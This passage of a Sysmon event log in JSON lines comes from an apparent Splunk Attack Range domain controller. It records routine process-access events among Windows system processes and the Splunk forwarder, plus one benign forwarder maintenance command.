05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00109BEB0300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00109BEB0300}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.078\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-00109BEB0300}\r\nSourceProcessId: 4084\r\nSourceThreadId: 4080\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.078","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-00109BEB0300}","SourceProcessId":"4084","SourceThreadId":"4080","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.108\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-001050EE0300}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.108","ProcessGuid":"{A837DB8D-01CA-5F25-0000-001050EE0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.094","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010766A0300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.094","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010766A0300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 